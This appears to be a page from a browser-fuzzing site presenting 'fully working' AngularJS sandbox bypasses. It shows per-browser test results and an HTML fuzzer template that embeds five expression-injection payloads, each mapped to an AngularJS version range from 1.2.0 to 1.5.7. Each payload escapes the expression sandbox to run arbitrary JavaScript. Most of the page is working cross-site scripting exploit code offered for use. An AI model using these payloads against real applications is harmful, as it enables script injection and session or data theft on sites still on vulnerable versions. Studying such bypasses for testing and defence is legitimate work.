AngularJS Sandbox Bypasses

Fully working bypasses across different versions curated from the community

By
skeptic_fx 1 Seen 2062 times
Tags
angular angularjs xss bypass sandbox
Run this test now.

Results


Tested on
Chrome - 67 - Windows 10
Fuzz data
lol

Tested on
Firefox - 60 - Mac OS X
Fuzz data
lol

Tested on
Chrome Mobile - 41 - Android
Fuzz data
lol

Tested on
Googlebot - 2.1 - undefined
Fuzz data
lol

Tested on
Chromium - 56 - Ubuntu
Fuzz data
lol

Tested on
Safari - 10.1.2 - Mac OS X
Fuzz data
lol

Tested on
Opera - 52 - Windows 7
Fuzz data
lol

User Script (FUZZER)

					
<!DOCTYPE html>
<html>
<script src="https://ajax.googleapis.com/ajax/libs/angularjs/***DS_ANGULARJS_VERSIONS***/angular.min.js"></script>
<script>
    var ver = '***DS_ANGULARJS_VERSIONS***'.replace(/\./g, '_');
    var aVector = ver + " -- a=toString().constructor.prototype;a.charAt=a.trim;$eval('a,alert(1),a')";
    var bVector = ver + " -- a=\"a\"[\"constructor\"].prototype;a.charAt=a.trim;$eval('a\",alert(alert=1),\"')";
    var cVector = ver + " -- c=toString.constructor;p=c.prototype;p.toString=p.call;[\"a\",\"alert(1)\"].sort(c)";
    var dVector = ver + " -- (_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')()";
    var eVector = ver + " -- a=\"a\"[\"constructor\"].prototype;a.charAt=a.trim;$eval('a\",alert(alert=1),\"')";
    aVector=bVector=cVector=dVector=eVector='lol';
</script>
<body>

<div ng-app="">
// a -  Versions 1.3.0 - 1.5.7:
{{a=toString().constructor.prototype;a.charAt=a.trim;$eval('a,addResult(aVector),a')}}
 
// b - Versions 1.2.20 - 1.2.29:
{{a="a"["constructor"].prototype;a.charAt=a.trim;$eval('a",addResult(alert=bVector),"')}}
 
// c - Version 1.2.19:
{{c=toString.constructor;p=c.prototype;p.toString=p.call;["a","addResult(cVector)"].sort(c)}}
 
// d - Versions 1.2.6 - 1.2.18:
{{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'addResult(dVector)')()}}
 
// e - Versions 1.2.0 - 1.2.5:
{{a="a"["constructor"].prototype;a.charAt=a.trim;$eval('a",addResult(alert=eVector),"')}}



<p>Input something in the input box:</p>
<p>Name: <input type="text" ng-model="name"></p>
<p ng-bind="name"></p>

</div>

</body>
</html>


					
				

Fuzz Data (FUZZER)

					
var DS_ANGULARJS_VERSIONS = ["1.5.7", "1.5.6", "1.5.5", "1.5.4", "1.5.3", "1.5.2", "1.5.1", "1.5.0", "1.4.12", "1.4.11", "1.4.10", "1.4.9", "1.4.8", "1.4.7", "1.4.6", "1.4.5", "1.4.4", "1.4.3", "1.4.2", "1.4.1", "1.4.0", "1.3.17", "1.3.16", "1.3.15", "1.3.14", "1.3.13", "1.3.12", "1.3.11", "1.3.10", "1.3.9", "1.3.8", "1.3.7", "1.3.6", "1.3.5", "1.3.4", "1.3.3", "1.3.2", "1.3.1", "1.3.0", "1.2.27", "1.2.26", "1.2.25", "1.2.24", "1.2.23", "1.2.22", "1.2.21", "1.2.20", "1.2.19", "1.2.18", "1.2.17", "1.2.16", "1.2.15", "1.2.14", "1.2.13", "1.2.12", "1.2.11", "1.2.10", "1.2.9", "1.2.8", "1.2.7", "1.2.6", "1.2.5", "1.2.4", "1.2.3", "1.2.2", "1.2.1", "1.2.0", "1.0.8", "1.0.7", "1.0.6", "1.0.5", "1.0.4", "1.0.3", "1.0.2", "1.0.1"];